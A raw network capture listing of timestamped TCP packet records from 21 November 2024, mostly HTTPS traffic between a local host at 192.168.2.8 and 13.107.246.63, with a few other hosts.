                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.703236103 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.703303099 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.703927994 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.704586983 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.915777922 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.919075966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.919132948 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.919151068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.919190884 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.919228077 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.921499014 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.921514988 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.921540976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.921583891 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.922543049 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.926419020 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.927229881 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.927931070 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.223352909 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.269750118 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.269843102 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.270023108 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.270102024 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.270204067 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281548977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281564951 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281574965 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281588078 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281630993 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281656981 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.285514116 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.286127090 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.287420988 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.288091898 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.396285057 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.415519953 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.415642977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.416737080 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.416774035 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.464695930 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.468799114 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.633960962 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634035110 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634107113 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634160042 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636229992 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636293888 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636423111 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636476994 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.638979912 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.639574051 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.640527964 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.641565084 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.717298985 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.759536028 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.759589911 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.760166883 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.761646032 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.931256056 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.936708927 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977636099 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977662086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977694035 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977721930 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.980500937 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.983087063 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.984563112 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.079575062 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.123092890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.140933990 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.144118071 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.145066023 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.255687952 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.279789925 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.334929943 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.348268032 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.352247000 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.369355917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.490447998 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.490560055 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.493916988 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508219004 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508236885 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508296967 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508296967 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.512695074 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.514130116 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.632752895 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.673890114 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.700320005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.718624115 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.718709946 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.742273092 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.801666021 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.802674055 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.842971087 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849524975 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849538088 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849761963 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.887676954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.898121119 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.900902033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.936170101 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.936219931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.965887070 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.007776022 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.021676064 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.026453018 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.149616003 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.196419001 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.218302965 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.224694014 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.225624084 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.232253075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.234427929 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.236929893 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.236999035 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.238934994 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.345587969 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.346426964 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.363663912 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.363828897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.401947021 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.406769037 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.566124916 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.566143036 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.566220045 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.570079088 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.571255922 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.584094048 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.584158897 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.584263086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.584309101 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.586885929 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.588150024 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.695080996 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.709441900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.773960114 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.804195881 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.911025047 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.911118031 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.912023067 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.912123919 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.915232897 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.916130066 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.925621033 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.925633907 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.925717115 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.925717115 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.928472996 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:12.929153919 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.042782068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.050996065 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.141180992 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.170077085 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.256973028 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.257164955 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.257179976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.257252932 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.260441065 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.262888908 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.264343977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.264630079 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.264708996 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.264803886 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.267178059 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.268481970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.337704897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.380965948 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.383255959 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.387423992 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.388844967 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.520637989 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.524194956 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.597207069 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.597280025 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.597332954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.597332954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.600588083 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.601587057 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.603528976 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.603565931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.603738070 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.603738070 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.605577946 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.607999086 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.643840075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.720177889 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.721357107 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.725574017 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.727504015 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.857342005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.862709045 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.903100014 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.935935974 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.938254118 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.939301968 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.939666033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.942011118 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.942970037 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.943281889 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.943290949 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.943337917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.946017027 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.946911097 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.984524965 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.059798956 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.061995029 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.065599918 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.066790104 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.207093954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.210006952 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.276238918 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282116890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282216072 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282282114 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.295501947 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.302886009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.305761099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.329767942 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.416891098 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.417224884 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.427002907 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.438965082 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.442903996 CET4434970523.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.442989111 CET49705443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.605725050 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.627557039 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.634985924 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.635391951 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.640960932 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.641372919 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.641433954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.790337086 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.792248011 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.792928934 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.793705940 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.845385075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.871906042 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.909889936 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.911744118 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.912369013 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.913152933 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.993839025 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227008104 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227142096 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227188110 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230227947 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230912924 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230962038 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.231040001 CET4434970713.107.246.63192.168.2.8
